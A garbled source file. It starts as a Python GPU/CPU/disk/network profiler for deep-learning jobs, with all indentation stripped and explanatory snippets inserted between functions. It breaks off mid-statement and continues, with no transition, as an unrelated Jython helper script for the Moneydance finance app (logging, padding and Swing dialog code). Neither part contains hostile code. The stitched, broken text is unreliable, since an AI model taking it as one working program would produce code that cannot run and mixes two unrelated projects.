# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
The profiler is used to profile the using information of the hardware while a deep learing model is running
"""
import pynvml as nv
import numpy as np
import pandas as pd
import glob
import csv
import os
import time
import argparse
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
from utils import Sample
from utils import Adviser
from utils import print_process
from utils import GPU_INFO_OFFSET
from utils import INFO_NUM_PER_GPU
from utils import GPU_MEM_OFFSET
from utils import SAMPLE_INFO
# To get the CPU running time of system from being booted
def get_system_cpu_ticks():
with open('/proc/stat', 'r') as f:
for line in f.readlines():
if line.startswith('cpu '):
items = line.split()
if len(items) < 8:
return -1
total_clock_ticks = 0
for item in items[1:8]:
total_clock_ticks += int(item)
return total_clock_ticks
return -1
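The `cpu ` line in `/proc/stat` holds aggregate jiffy counters: user, nice, system, idle, iowait, irq, softirq (fields 1-7, which is why the code sums `items[1:8]`). The same parse on a canned line:

```python
def parse_cpu_line(line):
    # sum the first seven counters after the 'cpu' label, as get_system_cpu_ticks does
    items = line.split()
    if not line.startswith('cpu ') or len(items) < 8:
        return -1
    return sum(int(item) for item in items[1:8])

sample = 'cpu  100 20 30 400 50 6 7 0 0 0'
ticks = parse_cpu_line(sample)  # 100+20+30+400+50+6+7 = 613
```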
# To get the CPU running time of container from being booted
def get_container_cpu_ticks(file_name):
user_time = 0
system_time = 0
with open(file_name, 'r') as f:
for line in f:
items = line.split()
if len(items) != 2:
return -1
if items[0] == 'user':
user_time = int(items[1])
elif items[0] == 'system':
system_time = int(items[1])
return user_time + system_time
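`get_container_cpu_ticks` reads a cgroup `cpuacct.stat`-style file, whose lines are `user N` and `system N`. The same parse on canned content:

```python
def parse_cpuacct_stat(text):
    # total container CPU ticks = user + system, mirroring get_container_cpu_ticks
    user_time = system_time = 0
    for line in text.splitlines():
        items = line.split()
        if len(items) != 2:
            return -1
        if items[0] == 'user':
            user_time = int(items[1])
        elif items[0] == 'system':
            system_time = int(items[1])
    return user_time + system_time

ticks = parse_cpuacct_stat('user 12345\nsystem 6789')  # -> 19134
```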
def get_cpu_ticks(file_name):
sys_ticks = get_system_cpu_ticks()
container_ticks = get_container_cpu_ticks(file_name)
return [sys_ticks, container_ticks]
def get_gpu_utilization(gpu_idx):
try:
handle = nv.nvmlDeviceGetHandleByIndex(gpu_idx)
util = nv.nvmlDeviceGetUtilizationRates(handle)
except nv.NVMLError as err:
util = err
return util
def get_gpu_memory(gpu_idx):
try:
handle = nv.nvmlDeviceGetHandleByIndex(gpu_idx)
mem = nv.nvmlDeviceGetMemoryInfo(handle)
except nv.NVMLError as err:
mem = err
return mem
def get_memory_percent(file_name):
total_memory_path = '/proc/meminfo'
memory_docker_used = 0.0
total_memory = 1.0
with open(file_name, 'r') as f:
for line in f:
memory_docker_used = int(line)
with open(total_memory_path, 'r') as f:
for line in f:
if line.startswith('MemTotal'):
lines = line.split()
total_memory = int(lines[1]) * 1024
break
return [memory_docker_used, total_memory]
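`/proc/meminfo` reports `MemTotal` in kiB, hence the `* 1024` to get bytes. The same parse on a canned line:

```python
def parse_mem_total(text):
    # MemTotal is reported in kiB; convert to bytes as get_memory_percent does
    for line in text.splitlines():
        if line.startswith('MemTotal'):
            return int(line.split()[1]) * 1024
    return 1  # fallback mirroring the function's total_memory default

total = parse_mem_total('MemTotal:       16384256 kB\nMemFree: 1 kB')
# 16384256 kiB -> 16777478144 bytes
```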
def get_disk_bytes(file_name):
read_bytes, write_bytes = 0, 0
with open(file_name, 'r') as f:
for line in f:
items = line.split()
if len(items) != 3 and len(items) != 2:
return -1
if items[1] == 'Read':
read_bytes += int(items[2])
elif items[1] == 'Write':
write_bytes += int(items[2])
return [read_bytes, write_bytes]
def get_network_bytes(file_name):
receive_bytes, transmit_bytes = 0, 0
with open(file_name, 'r') as f:
for line in f:
if len(line.split()) != 17:
continue
else:
items = line.split()
receive_bytes += int(items[1])
transmit_bytes += int(items[9])
return [receive_bytes, transmit_bytes]
Byte_GiByte = 1024 * 1024 * 1024
Byte_MiByte = 1024 * 1024
Byte_KiByte = 1024
# get the sample data according to the system file
def get_sample_data(cpu_file, mem_file, blk_file, net_file, gpu_id, period):
[mem_used, mem_total] = get_memory_percent(mem_file)
# 1st info about I/O, network and CPU
# read_bytes1 = get_disk_read_bytes(blk_file)
# write_bytes1 = get_disk_write_bytes(blk_file)
[read_bytes1, write_bytes1] = get_disk_bytes(blk_file)
[network_receive1, network_transmit1] = get_network_bytes(net_file)
[sys_ticks1, container_ticks1] = get_cpu_ticks(cpu_file)
time.sleep(period)
# 2nd info about I/O, network and CPU, calculate how many bytes used in this period
# read_bytes2 = get_disk_read_bytes(blk_file)
# write_bytes2 = get_disk_write_bytes(blk_file)
[read_bytes2, write_bytes2] = get_disk_bytes(blk_file)
[network_receive2, network_transmit2] = get_network_bytes(net_file)
[sys_ticks2, container_ticks2] = get_cpu_ticks(cpu_file)
online_cpus = os.sysconf(os.sysconf_names['SC_NPROCESSORS_ONLN'])
cpu_usage = (container_ticks2 - container_ticks1) * 1.0 / (sys_ticks2 - sys_ticks1) * online_cpus * 100
# get the usage of the GPU to analyze
gpu_usage = list()
gpu_mem = list()
gpu_mem_used = list()
gpu_mem_total = list()
for gid in gpu_id:
util = get_gpu_utilization(gid)
mem = get_gpu_memory(gid)
gpu_usage.append(util.gpu)
gpu_mem.append(util.memory)
gpu_mem_used.append(mem.used / Byte_GiByte)
gpu_mem_total.append(mem.total / Byte_GiByte)
sample_data = Sample(cpu_usage, mem_used / Byte_GiByte, mem_total / Byte_GiByte,
(read_bytes2 - read_bytes1) / period / Byte_KiByte,
(write_bytes2 - write_bytes1) / period / Byte_KiByte,
(network_receive2 - network_receive1) / period / Byte_KiByte,
(network_transmit2 - network_transmit1) / period / Byte_KiByte,
gpu_usage, gpu_mem, gpu_mem_used, gpu_mem_total)
return sample_data
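The CPU figure above scales the container's share of elapsed system ticks by the online-CPU count, so it can exceed 100% on multi-core hosts. A quick numeric check of that formula:

```python
def cpu_percent(container_ticks1, container_ticks2, sys_ticks1, sys_ticks2, online_cpus):
    # container share of elapsed system jiffies, scaled to per-host percent
    return (container_ticks2 - container_ticks1) * 1.0 / (sys_ticks2 - sys_ticks1) * online_cpus * 100

# container used 200 of 400 elapsed system ticks on a 4-core host -> 200%
usage = cpu_percent(1000, 1200, 5000, 5400, 4)
```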
# draw the graphs and save them to the files
def draw_graph(sample_datas, output_dir, period, gpu_id):
if not os.path.exists(output_dir + '/img'):
os.mkdir(output_dir + '/img')
sample_datas = np.array(sample_datas)
gpu_nums = len(gpu_id)
# draw the GPU memory usage
gpu_mem, legends, times = list(), list(), list()
for i in range(int(gpu_nums)):
gpu_mem.append(100 * sample_datas[:, GPU_INFO_OFFSET + GPU_MEM_OFFSET + i * INFO_NUM_PER_GPU] /
sample_datas[:, GPU_INFO_OFFSET + GPU_MEM_OFFSET + i * INFO_NUM_PER_GPU + 1]
)
legends.append('gpu_mem_used_' + str(gpu_id[i]))
for i in range(sample_datas.shape[0]):
times.append(i * period)
plt.figure()
plt.title('GPU Memory Utilization')
plt.xlabel('Time(s)')
plt.ylabel('GPU memory utilization(%)')
plt.plot(times, np.array(gpu_mem).T)
plt.legend(legends)
plt.grid(True)
plt.savefig(output_dir + '/img/GPU_MEM_Utilization.png')
# draw the GPU usage
gpu_usage, legends, times = list(), list(), list()
for i in range(int(gpu_nums)):
gpu_usage.append(sample_datas[:, GPU_INFO_OFFSET + i * INFO_NUM_PER_GPU])
legends.append('gpu_used_' + str(gpu_id[i]))
for i in range(sample_datas.shape[0]):
times.append(i * period)
plt.figure()
plt.title('GPU Utilization')
plt.xlabel('Time(s)')
plt.ylabel('GPU utilization(%)')
plt.plot(times, np.array(gpu_usage).T)
plt.legend(legends)
plt.grid(True)
plt.savefig(output_dir + '/img/GPU_UTI_Utilization.png')
# draw the CPU and GPU usage
times = list()
length = sample_datas.shape[0]
gpu_usage = sample_datas[int(0.6 * length):int(0.6 * length) + 1000, GPU_INFO_OFFSET]
cpu_usage = sample_datas[int(0.6 * length):int(0.6 * length) + 1000, SAMPLE_INFO.cpu_usage.value]
for i in range(gpu_usage.shape[0]):
times.append(i * period)
fig = plt.figure()
a1 = fig.add_subplot(111)
a1.set_title('CPU & GPU Utilization')
a1.plot(times, cpu_usage, label='cpu')
plt.legend(loc='best')
a1.set_ylim([0, np.max(cpu_usage) if np.max(cpu_usage) > 100 else 100])
a1.set_ylabel('CPU utilization(%)')
a1.set_xlabel('Time(s)')
a2 = a1.twinx()
a2.plot(times, gpu_usage, 'orange', label='gpu')
plt.legend(loc='best')
a2.set_ylim([0, 100])
a2.set_ylabel('GPU utilization(%)')
plt.grid(True)
plt.savefig(output_dir + '/img/CPU_GPU_Utilization.png')
# draw the IO usage
times = list()
# index 3 and 4 are the column of the I/O rate
io_rate = [sample_datas[:, SAMPLE_INFO.io_read.value], sample_datas[:, SAMPLE_INFO.io_write.value]]
legends = ['Disk read', 'Disk write']
for i in range(sample_datas.shape[0]):
times.append(i * period)
plt.figure()
plt.title('Disk Utilization')
plt.xlabel('Time(s)')
plt.ylabel('Disk Utilization(KBps)')
plt.plot(times, np.array(io_rate).T)
plt.legend(legends)
plt.grid(True)
plt.savefig(output_dir + '/img/Disk_Utilization.png')
# draw the network usage
times = list()
# index 5 and 6 are the column of the network rate
network_rate = [sample_datas[:, SAMPLE_INFO.network_inbound.value],
sample_datas[:, SAMPLE_INFO.network_outbound.value]]
legends = ['Network Inbound', 'Network Outbound']
for i in range(sample_datas.shape[0]):
times.append(i * period)
plt.figure()
plt.title('Network Usage')
plt.xlabel('Time(s)')
plt.ylabel('Network Utilization(KBps)')
plt.plot(times, np.array(network_rate).T)
plt.legend(legends)
plt.grid(True)
plt.savefig(output_dir + '/img/Network_Utilization.png')
def analyze_value(sample_datas, period, gpu_id):
sample_datas = np.array(sample_datas)
gpu_nums = len(gpu_id)
# analyze the CPU usage
# index 0 is the CPU usage
cpu_usage = np.sort(sample_datas[:, SAMPLE_INFO.cpu_usage.value])
print('For the CPU, here is the analysis result:')
print('The max value of the CPU Utilization is', str(np.max(cpu_usage)) + '%')
print('The min value of the CPU Utilization is', str(np.min(cpu_usage)) + '%')
print('The average value of the CPU Utilization is', str(np.average(cpu_usage)) + '%')
print('The standard deviation of the CPU Utilization is', str(np.std(cpu_usage)) + '%')
print('The median (50th percentile) of the CPU Utilization is', str(cpu_usage[int(0.5 * cpu_usage.shape[0])]) + '%')
print('The 80th percentile of the CPU Utilization is', str(cpu_usage[int(0.8 * cpu_usage.shape[0])]) + '%')
print('===================================================================')
# analyze the Disk
# index 3 and 4 are the Disk read and write
disk_read = np.sort(sample_datas[:, SAMPLE_INFO.io_read.value])
disk_write = np.sort(sample_datas[:, SAMPLE_INFO.io_write.value])
print('For the Disk, here is the analysis result:')
print('The max value of the Disk read is', str(np.max(disk_read)) + 'KBps')
min_read = 0
for i in range(disk_read.shape[0]):
min_read = disk_read[i]
if min_read > 0:
break
print('The min value of the Disk read (without zero) is', str(min_read) + 'KBps')
print('The max value of the Disk write is', str(np.max(disk_write)) + 'KBps')
min_write = 0
for i in range(disk_write.shape[0]):
min_write = disk_write[i]
if min_write > 0:
break
print('The min value of the Disk write (without zero) is', str(min_write) + 'KBps')
print('The total read volume of the Disk is', str(np.sum(disk_read) * period) + 'KB')
print('The total write volume of the Disk is', str(np.sum(disk_write) * period) + 'KB')
print('===================================================================')
# analyze the Network
# index 5 and 6 are the Network inbound and outbound
network_inbound = np.sort(sample_datas[:, SAMPLE_INFO.network_inbound.value])
network_outbound = np.sort(sample_datas[:, SAMPLE_INFO.network_outbound.value])
print('For the Network, here is the analysis result:')
print('The | |
/ summary screen widget. Display the total of selected Account Balances
total_selected_transactions: One-click. Shows a popup total of the register txn amounts selected on screen
Extension (.mxt) and Script (.py) Versions available:
extract_data Extract various data to screen and/or csv.. Consolidation of:
- stockglance2020 View summary of Securities/Stocks on screen, total by Security, export to csv
- extract_reminders_csv View reminders on screen, edit if required, extract all to csv
- extract_currency_history_csv Extract currency history to csv
- extract_investment_transactions_csv Extract investment transactions to csv
- extract_account_registers_csv Extract Account Register(s) to csv along with any attachments
list_future_reminders: View future reminders on screen. Allows you to set the days to look forward
A collection of useful ad-hoc scripts (zip file)
useful_scripts: Just unzip and select the script you want for the task at hand...
Visit: %s (Author's site)
----------------------------------------------------------------------------------------------------------------------
""" %(myScriptName, MYPYTHON_DOWNLOAD_URL)
def cleanup_references():
global MD_REF, MD_REF_UI, MD_EXTENSION_LOADER
myPrint("DB","About to delete reference to MD_REF, MD_REF_UI and MD_EXTENSION_LOADER....!")
del MD_REF, MD_REF_UI, MD_EXTENSION_LOADER
def load_text_from_stream_file(theStream):
myPrint("DB", "In ", inspect.currentframe().f_code.co_name, "()")
cs = Charset.forName("UTF-8")
istream = theStream
if not istream:
myPrint("B","... Error - the input stream is None")
return "<NONE>"
fileContents = ""
istr = bufr = None
try:
istr = InputStreamReader(istream, cs)
bufr = BufferedReader(istr)
while True:
line = bufr.readLine()
if line is None:
break
fileContents += line + "\n"
fileContents+="\n<END>"
except:
myPrint("B", "ERROR reading from input stream... ")
dump_sys_error_to_md_console_and_errorlog()
try: bufr.close()
except: pass
try: istr.close()
except: pass
try: istream.close()
except: pass
myPrint("DB", "Exiting ", inspect.currentframe().f_code.co_name, "()")
return fileContents
# P=Display on Python Console, J=Display on MD (Java) Console Error Log, B=Both, D=If Debug Only print, DB=print both
def myPrint(where, *args):
global myScriptName, debug, i_am_an_extension_so_run_headless
if where[0] == "D" and not debug: return
printString = ""
for what in args:
printString += "%s " %what
printString = printString.strip()
if where == "P" or where == "B" or where[0] == "D":
if not i_am_an_extension_so_run_headless:
try:
print(printString)
except:
print("Error writing to screen...")
dump_sys_error_to_md_console_and_errorlog()
if where == "J" or where == "B" or where == "DB":
dt = datetime.datetime.now().strftime("%Y/%m/%d-%H:%M:%S")
try:
System.err.write(myScriptName + ":" + dt + ": ")
System.err.write(printString)
System.err.write("\n")
except:
System.err.write(myScriptName + ":" + dt + ": "+"Error writing to console")
dump_sys_error_to_md_console_and_errorlog()
return
def dump_sys_error_to_md_console_and_errorlog( lReturnText=False ):
theText = ""
myPrint("B","Unexpected error caught: %s" %(sys.exc_info()[0]))
myPrint("B","Unexpected error caught: %s" %(sys.exc_info()[1]))
myPrint("B","Error on Script Line Number: %s" %(sys.exc_info()[2].tb_lineno))
if lReturnText:
theText += "\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n"
theText += "Unexpected error caught: %s\n" %(sys.exc_info()[0])
theText += "Unexpected error caught: %s\n" %(sys.exc_info()[1])
theText += "Error on Script Line Number: %s\n" %(sys.exc_info()[2].tb_lineno)
theText += "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n"
return theText
return
def pad(theText, theLength):
theText = theText[:theLength].ljust(theLength, u" ")
return theText
def rpad(theText, theLength):
if not (isinstance(theText, unicode) or isinstance(theText, str)):
theText = str(theText)
theText = theText[:theLength].rjust(theLength, u" ")
return theText
def cpad(theText, theLength):
if not (isinstance(theText, unicode) or isinstance(theText, str)):
theText = str(theText)
if len(theText) >= theLength: return theText[:theLength]
padLength = int((theLength - len(theText)) / 2)
theText = ((u" " * padLength) + theText).ljust(theLength, u" ")
return theText
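The padding helpers above truncate first, then pad to a fixed width. A quick demonstration of `pad` and `rpad` semantics (re-defined inline so the sketch is self-contained):

```python
def pad(text, length):
    # left-justify, truncating first so the result is always exactly `length` wide
    return text[:length].ljust(length, u' ')

def rpad(text, length):
    # right-justify, coercing non-string input first, as the original does
    if not isinstance(text, str):
        text = str(text)
    return text[:length].rjust(length, u' ')

left = pad('abc', 6)          # 'abc   '
right = rpad(42, 6)           # '    42'
clipped = pad('abcdefgh', 4)  # 'abcd'
```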
myPrint("B", myScriptName, ": Python Script Initialising.......", "Build:", version_build)
def getMonoFont():
global debug
try:
theFont = MD_REF.getUI().getFonts().code
# if debug: myPrint("B","Success setting Font set to Moneydance code: %s" %theFont)
except:
theFont = Font("monospaced", Font.PLAIN, 15)
if debug: myPrint("B","Failed to set Font to Moneydance code font - so using: %s" %theFont)
return theFont
def getTheSetting(what):
x = MD_REF.getPreferences().getSetting(what, None)
if not x or x == u"": return None
return what + u": %s" %(x)
def get_home_dir():
homeDir = None
# noinspection PyBroadException
try:
if Platform.isOSX():
homeDir = System.getProperty(u"UserHome") # On a Mac in a Java VM, the homedir is hidden
else:
# homeDir = System.getProperty("user.home")
homeDir = os.path.expanduser(u"~") # Should work on Unix and Windows
if homeDir is None or homeDir == u"":
homeDir = System.getProperty(u"user.home")
if homeDir is None or homeDir == u"":
homeDir = os.environ.get(u"HOMEPATH")
except:
pass
if not homeDir: homeDir = u"?"
return homeDir
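get_home_dir() works through a chain of fallbacks until one yields a usable path; a pure-Python sketch of the same idea (the Java `System.getProperty` lookups are omitted, so this is illustrative only):

```python
import os

def get_home_dir_fallback():
    # first match wins: expanduser, then common environment variables,
    # then the script's "?" sentinel, mirroring the helper above
    for candidate in (os.path.expanduser("~"),
                      os.environ.get("HOME"),
                      os.environ.get("HOMEPATH")):
        if candidate and candidate != "~":
            return candidate
    return "?"

print(get_home_dir_fallback())
```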
def getDecimalPoint(lGetPoint=False, lGetGrouping=False):
global debug
decimalFormat = DecimalFormat.getInstance()
# noinspection PyUnresolvedReferences
decimalSymbols = decimalFormat.getDecimalFormatSymbols()
if not lGetGrouping: lGetPoint = True
if lGetGrouping and lGetPoint: return u"error"
try:
if lGetPoint:
_decimalCharSep = decimalSymbols.getDecimalSeparator()
myPrint(u"D",u"Decimal Point Character: %s" %(_decimalCharSep))
return _decimalCharSep
if lGetGrouping:
_groupingCharSep = decimalSymbols.getGroupingSeparator()
if _groupingCharSep is None or _groupingCharSep == u"":
myPrint(u"B", u"Caught empty Grouping Separator")
return u""
if ord(_groupingCharSep) >= 128: # Probably a nbsp (160) = e.g. South Africa for example..!
myPrint(u"B", u"Caught special character in Grouping Separator. Ord(%s)" %(ord(_groupingCharSep)))
if ord(_groupingCharSep) == 160:
return u" (non breaking space character)"
return u" (non printable character)"
myPrint(u"D",u"Grouping Separator Character:", _groupingCharSep)
return _groupingCharSep
except:
myPrint(u"B",u"Error in getDecimalPoint() routine....?")
dump_sys_error_to_md_console_and_errorlog()
return u"error"
decimalCharSep = getDecimalPoint(lGetPoint=True)
groupingCharSep = getDecimalPoint(lGetGrouping=True)
# JOptionPane.DEFAULT_OPTION, JOptionPane.YES_NO_OPTION, JOptionPane.YES_NO_CANCEL_OPTION, JOptionPane.OK_CANCEL_OPTION
# JOptionPane.ERROR_MESSAGE, JOptionPane.INFORMATION_MESSAGE, JOptionPane.WARNING_MESSAGE, JOptionPane.QUESTION_MESSAGE, JOptionPane.PLAIN_MESSAGE
# Copies MD_REF.getUI().showInfoMessage
def myPopupInformationBox(theParent=None, theMessage="What no message?!", theTitle="Info", theMessageType=JOptionPane.INFORMATION_MESSAGE):
if theParent is None:
if theMessageType == JOptionPane.PLAIN_MESSAGE or theMessageType == JOptionPane.INFORMATION_MESSAGE:
icon_to_use=MD_REF.getUI().getIcon("/com/moneydance/apps/md/view/gui/glyphs/appicon_64.png")
JOptionPane.showMessageDialog(theParent, JTextPanel(theMessage), theTitle, theMessageType, icon_to_use)
return
JOptionPane.showMessageDialog(theParent, JTextPanel(theMessage), theTitle, theMessageType)
return
def wrapLines(message, numChars=40):
charCount = 0
result=""
for ch in message:
if ch == '\n' or ch == '\r':
charCount = 0
elif charCount > numChars and not Character.isWhitespace(ch):
result+="\n"
charCount = 0
else:
charCount+=1
result+=ch
return result
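wrapLines() inserts a break once a line exceeds numChars and the next character is not whitespace; the stdlib `textwrap` module gives comparable greedy wrapping in plain Python (an illustrative alternative, not a drop-in replacement):

```python
import textwrap

def wrap_lines(message, num_chars=40):
    # wrap each paragraph independently, preserving blank lines
    wrapped = [textwrap.fill(para, width=num_chars) if para else ""
               for para in message.splitlines()]
    return "\n".join(wrapped)

print(wrap_lines("the quick brown fox jumps over the lazy dog", 15))
```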
def myPopupAskBackup(theParent=None, theMessage="What no message?!", lReturnTheTruth=False):
_options=["STOP", "PROCEED WITHOUT BACKUP", "DO BACKUP NOW"]
response = JOptionPane.showOptionDialog(theParent,
theMessage,
"PERFORM BACKUP BEFORE UPDATE?",
0,
JOptionPane.WARNING_MESSAGE,
None,
_options,
_options[0])
if response == 2:
myPrint("B", "User requested to perform Export Backup before update/fix - calling moneydance export backup routine...")
MD_REF.getUI().setStatus("%s performing an Export Backup...." %(myScriptName),-1.0)
MD_REF.getUI().saveToBackup(None)
MD_REF.getUI().setStatus("%s Export Backup completed...." %(myScriptName),0)
return True
elif response == 1:
myPrint("B", "User DECLINED to perform Export Backup before update/fix...!")
if not lReturnTheTruth:
return True
return False
# Copied MD_REF.getUI().askQuestion
def myPopupAskQuestion(theParent=None,
theTitle="Question",
theQuestion="What?",
theOptionType=JOptionPane.YES_NO_OPTION,
theMessageType=JOptionPane.QUESTION_MESSAGE):
icon_to_use = None
if theParent is None:
if theMessageType == JOptionPane.PLAIN_MESSAGE or theMessageType == JOptionPane.INFORMATION_MESSAGE:
icon_to_use=MD_REF.getUI().getIcon("/com/moneydance/apps/md/view/gui/glyphs/appicon_64.png")
# question = wrapLines(theQuestion)
question = theQuestion
result = JOptionPane.showConfirmDialog(theParent,
question,
theTitle,
theOptionType,
theMessageType,
icon_to_use) # getIcon("/com/moneydance/apps/md/view/gui/glyphs/appicon_64.png"))
return result == 0
# Copies Moneydance .askForQuestion
def myPopupAskForInput(theParent,
theTitle,
theFieldLabel,
theFieldDescription="",
defaultValue=None,
isPassword=False,
theMessageType=JOptionPane.INFORMATION_MESSAGE):
icon_to_use = None
if theParent is None:
if theMessageType == JOptionPane.PLAIN_MESSAGE or theMessageType == JOptionPane.INFORMATION_MESSAGE:
icon_to_use=MD_REF.getUI().getIcon("/com/moneydance/apps/md/view/gui/glyphs/appicon_64.png")
p = JPanel(GridBagLayout())
defaultText = None
if defaultValue: defaultText = defaultValue
if isPassword:
field = JPasswordField(defaultText)
else:
field = JTextField(defaultText)
x = 0
if theFieldLabel:
p.add(JLabel(theFieldLabel), GridC.getc(x, 0).east())
x+=1
p.add(field, GridC.getc(x, 0).field())
p.add(Box.createHorizontalStrut(244), GridC.getc(x, 0))
if theFieldDescription:
p.add(JTextPanel(theFieldDescription), GridC.getc(x, 1).field().colspan(x + 1))
if (JOptionPane.showConfirmDialog(theParent,
p,
theTitle,
JOptionPane.OK_CANCEL_OPTION,
theMessageType,
icon_to_use) == 0):
return field.getText()
return None
# APPLICATION_MODAL, DOCUMENT_MODAL, MODELESS, TOOLKIT_MODAL
class MyPopUpDialogBox():
def __init__(self, theParent=None, theStatus="", theMessage="", theWidth=200, theTitle="Info", lModal=True, lCancelButton=False, OKButtonText="OK", lAlertLevel=0):
self.theParent = theParent
self.theStatus = theStatus
self.theMessage = theMessage
self.theWidth = max(80,theWidth)
self.theTitle = theTitle
self.lModal = lModal
self.lCancelButton = lCancelButton
self.OKButtonText = OKButtonText
self.lAlertLevel = lAlertLevel
self.fakeJFrame = None
self._popup_d = None
self.lResult = [None]
if not self.theMessage.endswith("\n"): self.theMessage+="\n"
if self.OKButtonText == "": self.OKButtonText="OK"
class WindowListener(WindowAdapter):
def __init__(self, theDialog, theFakeFrame, lResult):
self.theDialog = theDialog
self.theFakeFrame = theFakeFrame
self.lResult = lResult
def windowClosing(self, WindowEvent): # noqa
global debug
myPrint("DB", "In ", inspect.currentframe().f_code.co_name, "()", "Event: ", WindowEvent)
myPrint("DB", "SwingUtilities.isEventDispatchThread() = %s" %(SwingUtilities.isEventDispatchThread()))
myPrint("DB", "JDialog Frame shutting down....")
self.lResult[0] = False
# Note - listeners are already on the EDT
if self.theFakeFrame is not None:
self.theDialog.dispose()
self.theFakeFrame.dispose()
else:
self.theDialog.dispose()
myPrint("D", "Exiting ", inspect.currentframe().f_code.co_name, "()")
return
class OKButtonAction(AbstractAction):
# noinspection PyMethodMayBeStatic
def __init__(self, theDialog, theFakeFrame, lResult):
self.theDialog = theDialog
self.theFakeFrame = theFakeFrame
self.lResult = lResult
def actionPerformed(self, event):
global debug
myPrint("DB", "In ", inspect.currentframe().f_code.co_name, "()", "Event: ", event)
myPrint("DB", "SwingUtilities.isEventDispatchThread() = %s" %(SwingUtilities.isEventDispatchThread()))
self.lResult[0] = True
# Note - listeners are already on the EDT
if self.theFakeFrame is not None:
self.theDialog.dispose()
self.theFakeFrame.dispose()
else:
self.theDialog.dispose()
myPrint("D", "Exiting ", inspect.currentframe().f_code.co_name, "()")
return
class CancelButtonAction(AbstractAction):
# noinspection PyMethodMayBeStatic
def __init__(self, theDialog, theFakeFrame, lResult):
self.theDialog = theDialog
self.theFakeFrame = theFakeFrame
self.lResult = lResult
def actionPerformed(self, event):
global debug
myPrint("DB", "In ", inspect.currentframe().f_code.co_name, "()", "Event: ", event)
myPrint("DB", "SwingUtilities.isEventDispatchThread() = %s" %(SwingUtilities.isEventDispatchThread()))
self.lResult[0] = False
# Note - listeners are already on the EDT
if self.theFakeFrame is not None:
self.theDialog.dispose()
self.theFakeFrame.dispose()
else:
self.theDialog.dispose()
myPrint("D", "Exiting ", inspect.currentframe().f_code.co_name, "()")
return
def kill(self):
global debug
myPrint("DB", "In ", inspect.currentframe().f_code.co_name, "()")
myPrint("DB", "SwingUtilities.isEventDispatchThread() = %s" %(SwingUtilities.isEventDispatchThread()))
if not SwingUtilities.isEventDispatchThread():
SwingUtilities.invokeLater(GenericVisibleRunnable(self._popup_d, False))
if self.fakeJFrame is not None:
SwingUtilities.invokeLater(GenericDisposeRunnable(self._popup_d))
SwingUtilities.invokeLater(GenericDisposeRunnable(self.fakeJFrame))
else:
SwingUtilities.invokeLater(GenericDisposeRunnable(self._popup_d))
else:
self._popup_d.setVisible(False)
if self.fakeJFrame is not None:
self._popup_d.dispose()
self.fakeJFrame.dispose()
else:
self._popup_d.dispose()
myPrint("D", "Exiting ", inspect.currentframe().f_code.co_name, "()")
return
def result(self):
global debug
return self.lResult[0]
def go(self):
global debug
myPrint("DB", "In ", inspect.currentframe().f_code.co_name, "()")
myPrint("DB", "SwingUtilities.isEventDispatchThread() = %s" %(SwingUtilities.isEventDispatchThread()))
class MyPopUpDialogBoxRunnable(Runnable):
def __init__(self, callingClass):
self.callingClass = callingClass
def run(self): # noqa
myPrint("DB", "In ", inspect.currentframe().f_code.co_name, "()")
myPrint("DB", "SwingUtilities.isEventDispatchThread() = %s" %(SwingUtilities.isEventDispatchThread()))
# Create a fake JFrame so we can set the Icons...
if self.callingClass.theParent is None:
self.callingClass.fakeJFrame = MyJFrame()
self.callingClass.fakeJFrame.setName(u"%s_fake_dialog" %(myModuleID))
self.callingClass.fakeJFrame.setDefaultCloseOperation(WindowConstants.DO_NOTHING_ON_CLOSE)
self.callingClass.fakeJFrame.setUndecorated(True)
self.callingClass.fakeJFrame.setVisible( False )
if not Platform.isOSX():
self.callingClass.fakeJFrame.setIconImage(MDImages.getImage(MD_REF.getSourceInformation().getIconResource()))
if self.callingClass.lModal:
# noinspection PyUnresolvedReferences
self.callingClass._popup_d = JDialog(self.callingClass.theParent, self.callingClass.theTitle, Dialog.ModalityType.APPLICATION_MODAL)
else:
# noinspection PyUnresolvedReferences
self.callingClass._popup_d = JDialog(self.callingClass.theParent, self.callingClass.theTitle, Dialog.ModalityType.MODELESS)
self.callingClass._popup_d.setDefaultCloseOperation(WindowConstants.DO_NOTHING_ON_CLOSE)
shortcut = Toolkit.getDefaultToolkit().getMenuShortcutKeyMaskEx()
# Add standard CMD-W keystrokes etc to close window
self.callingClass._popup_d.getRootPane().getInputMap(JComponent.WHEN_ANCESTOR_OF_FOCUSED_COMPONENT).put(KeyStroke.getKeyStroke(KeyEvent.VK_W, shortcut), "close-window")
self.callingClass._popup_d.getRootPane().getInputMap(JComponent.WHEN_ANCESTOR_OF_FOCUSED_COMPONENT).put(KeyStroke.getKeyStroke(KeyEvent.VK_F4, shortcut), "close-window")
self.callingClass._popup_d.getRootPane().getInputMap(JComponent.WHEN_IN_FOCUSED_WINDOW).put(KeyStroke.getKeyStroke(KeyEvent.VK_ESCAPE, 0), "close-window")
self.callingClass._popup_d.getRootPane().getActionMap().put("close-window", self.callingClass.CancelButtonAction(self.callingClass._popup_d, self.callingClass.fakeJFrame,self.callingClass.lResult))
self.callingClass._popup_d.addWindowListener(self.callingClass.WindowListener(self.callingClass._popup_d, self.callingClass.fakeJFrame,self.callingClass.lResult))
if (not Platform.isMac()):
# MD_REF.getUI().getImages()
self.callingClass._popup_d.setIconImage(MDImages.getImage(MD_REF.getSourceInformation().getIconResource()))
displayJText = JTextArea(self.callingClass.theMessage)
displayJText.setFont( getMonoFont() )
displayJText.setEditable(False)
displayJText.setLineWrap(False)
displayJText.setWrapStyleWord(False)
_popupPanel=JPanel()
# maxHeight = 500
_popupPanel.setLayout(GridLayout(0,1))
_popupPanel.setBorder(EmptyBorder(8, 8, 8, 8))
if self.callingClass.theStatus:
_label1 = JLabel(pad(self.callingClass.theStatus,self.callingClass.theWidth-20))
_label1.setForeground(Color.BLUE)
